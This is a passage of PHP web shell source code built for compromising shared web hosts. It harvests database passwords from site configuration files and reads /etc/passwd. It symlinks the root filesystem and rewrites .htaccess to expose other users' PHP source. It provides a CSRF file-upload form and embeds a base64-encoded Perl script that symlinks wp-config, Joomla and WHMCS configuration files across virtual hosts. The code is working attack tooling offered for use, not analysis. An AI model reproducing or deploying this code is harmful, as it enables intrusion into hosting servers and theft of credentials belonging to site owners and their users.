  1744. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1745. {
  1746.  
  1747. //Other
  1748.  
  1749. $db=entre2v2($uxl,"dbpass = '","';");
  1750. if(!empty($db))
  1751. $pass=$db."\n";
  1752. fwrite($ffile,$pass);
  1753.  
  1754. }
  1755. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1756. {
  1757.  
  1758. //Other
  1759.  
  1760. $db=entre2v2($uxl,"dbpass = \"","\";");
  1761. if(!empty($db))
  1762. $pass=$db."\n";
  1763. fwrite($ffile,$pass);
  1764. }
  1765.  
  1766.  
  1767. }
  1768. }
  1769. echo "<center>
  1770. <a href=\"mct_symconf/root/\">Root Server</a>
  1771. <br><a href=\"mct_symconf/Passwords.txt\">Passwords</a>
  1772. <br><a href=\"mct_symconf/\">Configurations</a></center>";
  1773. }
  1774. else
  1775. {
  1776. echo "<center>
  1777. <form method=\"POST\">
  1778. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  1779. $file = '/etc/passwd';
  1780. $read = @fopen($file, 'r');
  1781. if ($read){
  1782. $body = @fread($read, @filesize($file));
  1783. echo "".htmlentities($body)."";
  1784. }
  1785. elseif(!$read)
  1786. {
  1787. $read = @show_source($file) ;
  1788. }
  1789. elseif(!$read)
  1790. {
  1791. $read = @highlight_file($file);
  1792. }
  1793. elseif(!$read)
  1794. {
  1795. for($uid=0;$uid<1000;$uid++)
  1796. {
  1797. $ara = posix_getpwuid($uid);
  1798. if (!empty($ara))
  1799. {
  1800. while (list ($key, $val) = each($ara))
  1801. {
  1802. print "$val:";
  1803. }
  1804. print "\n";
  1805. }}}
  1806.  
  1807. flush();
  1808.  
  1809. echo "</textarea>
  1810. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  1811. </form></center>";
  1812. }
  1813. }
  1814. }
  1815. elseif($_GET['do'] == 'symlink') {
  1816. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1817. $d0mains = @file("/etc/named.conf");
  1818. ##httaces
  1819. if($d0mains){
  1820. @mkdir("mct_sym",0777);
  1821. @chdir("mct_sym");
  1822. @exe("ln -s / root");
  1823. $file3 = 'Options Indexes FollowSymLinks
  1824. DirectoryIndex z.htm
  1825. AddType text/plain .php
  1826. AddHandler text/plain .php
  1827. Satisfy Any';
  1828. $fp3 = fopen('.htaccess','w');
  1829. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1830. echo "
  1831. <table align=center border=1 style='width:80%;border-color:lime;'>
  1832. <tr>
  1833. <td align=center><font size=2>S. No.</font></td>
  1834. <td align=center><font size=2>Domains</font></td>
  1835. <td align=center><font size=2>Users</font></td>
  1836. <td align=center><font size=2>Symlink</font></td>
  1837. </tr>";
  1838. $dcount = 1;
  1839. foreach($d0mains as $d0main){
  1840. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1841. flush();
  1842. if(strlen(trim($domains[1][0])) > 2){
  1843. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1844. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1845. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1846. <td>".$user['name']."</td>
  1847. <td><a href='$full/mct_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1848. flush();
  1849. $dcount++;}}}
  1850. echo "</table>";
  1851. }else{
  1852. $TEST=@file('/etc/passwd');
  1853. if ($TEST){
  1854. @mkdir("mct_sym",0777);
  1855. @chdir("mct_sym");
  1856. exe("ln -s / root");
  1857. $file3 = 'Options Indexes FollowSymLinks
  1858. DirectoryIndex z.htm
  1859. AddType text/plain .php
  1860. AddHandler text/plain .php
  1861. Satisfy Any';
  1862. $fp3 = fopen('.htaccess','w');
  1863. $fw3 = fwrite($fp3,$file3);
  1864. @fclose($fp3);
  1865. echo "
  1866. <table align=center border=1><tr>
  1867. <td align=center><font size=3>S. No.</font></td>
  1868. <td align=center><font size=3>Users</font></td>
  1869. <td align=center><font size=3>Symlink</font></td></tr>";
  1870. $dcount = 1;
  1871. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1872. while(!feof($file)){
  1873. $s = fgets($file);
  1874. $matches = array();
  1875. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1876. $matches = str_replace("home/","",$matches[1]);
  1877. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1878. continue;
  1879. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1880. <td align=center><font class=txt>" . $matches . "</td>";
  1881. echo "<td align=center><font class=txt><a href=$full/mct_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1882. $dcount++;}fclose($file);
  1883. echo "</table>";}else{if($os != "Windows"){@mkdir("mct_sym",0777);@chdir("mct_sym");@exe("ln -s / root");$file3 = '
  1884. Options Indexes FollowSymLinks
  1885. DirectoryIndex z.htm
  1886. AddType text/plain .php
  1887. AddHandler text/plain .php
  1888. Satisfy Any
  1889. ';
  1890. $fp3 = fopen('.htaccess','w');
  1891. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1892. echo "
  1893. <div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>Human Symlink</div>
  1894. <div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>
  1895. <table class='human' align=center border=1><tr>
  1896. <td align=center><font size=4>ID</font></td>
  1897. <td align=center><font size=4>Users</font></td>
  1898. <td align=center><font size=4>Symlink</font></td></tr>";
  1899. $temp = "";$val1 = 0;$val2 = 1000;
  1900. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1901. if ($uid)$temp .= join(':',$uid)."\n";}
  1902. echo '<br/>';$temp = trim($temp);$file5 =
  1903. fopen("test.txt","w");
  1904. fputs($file5,$temp);
  1905. fclose($file5);$dcount = 1;$file =
  1906. fopen("test.txt", "r") or exit("Unable to open file!");
  1907. while(!feof($file)){$s = fgets($file);$matches = array();
  1908. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1909. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1910. continue;
  1911. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1912. <td align=center><font class=txt>" . $matches . "</td>";
  1913. echo "<td align=center><font class=txt><a href=$full/mct_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1914. $dcount++;}
  1915. fclose($file);
  1916. echo "</table></div></center>";unlink("test.txt");
  1917. } else
  1918. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1919. }
  1920. }
  1921. }
  1922. elseif($_GET['do'] == 'csrf') {
  1923. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'> [+] CSRF Exploiter Online [+]</div>";
  1924. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  1925. echo "<center>
  1926. <form method='post'>
  1927. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='http://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  1928. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  1929. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  1930. </form></table>";
  1931. $url = $_POST['url'];
  1932. $data = $_POST['data'];
  1933. $submit = $_POST['go'];
  1934. if($submit) {
  1935. echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  1936. </form></div>";
  1937. }
  1938. ;} elseif($_GET['do'] == 'config') {
  1939. $mct = mkdir("mct_config", 0777);
  1940. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  1941. $htc = fopen("mct_config/.htaccess","w");
  1942. fwrite($htc, $isi_htc);
  1943. fclose($htc);
  1944. if(preg_match("/vhosts|vhost/", $dir)) {
  1945. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1946. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9